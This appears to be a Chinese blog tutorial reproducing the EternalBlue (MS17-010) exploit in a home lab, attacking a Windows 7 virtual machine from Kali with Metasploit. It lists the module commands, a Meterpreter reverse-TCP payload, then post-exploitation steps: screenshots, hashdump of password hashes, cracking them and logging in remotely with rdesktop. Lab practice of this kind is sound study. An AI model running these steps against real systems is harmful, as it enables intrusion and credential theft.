永恒之蓝(ms17_010)复现

永恒之蓝(ms17_010)复现

  • 准备工作
    • 正式复现
      • ping
      • 使用metaspoilt中的msfconsole
        • 搜索模块
        • 使用模块
        • 查看模块
        • 设置模块
          • 设置攻击目标
          • 设置攻击载荷
          • 设置监听地址
          • 设置逻辑端口
        • 开始攻击
      • 成功了我们可以做什么
        • 远程登陆
  • 需要注意操作需要打开管理员权限,以及以上操作仅供参考不一定百分百正确

准备工作

  1. 虚拟机安装完成
  2. 网络配置完成(注意校园网选NAT模式,学校的校园网不允许生成虚拟IP)或者使用手机热点进行联网

正式复现

ping

1.打开虚拟机查看win7的IP地址
永恒之蓝(ms17_010)复现_第1张图片
2.打开kali终端ping目标机看能否ping通
永恒之蓝(ms17_010)复现_第2张图片
如果ping不通查看自己是否连的校园网,如果是选择NAT模式

使用metaspoilt中的msfconsole

永恒之蓝(ms17_010)复现_第3张图片
这里弹出的图形每次都不一样,和我的不一样非常的正常

搜索模块

搜索永恒之蓝漏洞编号ms17_010(意思是微软17年发现的第十个高危漏洞)
输入search ms17-010
永恒之蓝(ms17_010)复现_第4张图片

使用模块

1.上面图片中#那一列可以看到0,1,2,3,的编号这就是我们可以使用的。我们使用0
2.输入use 0
在这里插入图片描述

查看模块

输入show options可以查看我们需要设置的模块
永恒之蓝(ms17_010)复现_第5张图片
注意required为yes的为必必选项

设置模块

永恒之蓝(ms17_010)复现_第6张图片

设置攻击目标

set rhosts 目标机ip地址

set rhosts 192.168.245.187

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

设置监听地址

set lhost 我们自己的的IP地址

设置逻辑端口

这里选0到60000中的,建议选大一点例如44444

开始攻击

run
永恒之蓝(ms17_010)复现_第7张图片
当出现了meterpreter时证明你成功了

成功了我们可以做什么

这个时候就可以进行一些入侵行为
例如
截取目标机屏幕screenshot
查看目标机系统配置sysinfo
查看目标机密码等hashdump
永恒之蓝(ms17_010)复现_第8张图片这里的密码等信息是进行加密了的需要自行解密
还有很多可以做的可以输入help进行查看

远程登陆

当通过hashdump拿到加密和后的密码可以利用对应的解码工具进行解码获得目标机密码
在中端中有一个命令rdesktop加对应的IP地址就可以远程登录目标机
永恒之蓝(ms17_010)复现_第9张图片

需要注意操作需要打开管理员权限,以及以上操作仅供参考不一定百分百正确

你可能感兴趣的:(网络,网络安全,安全)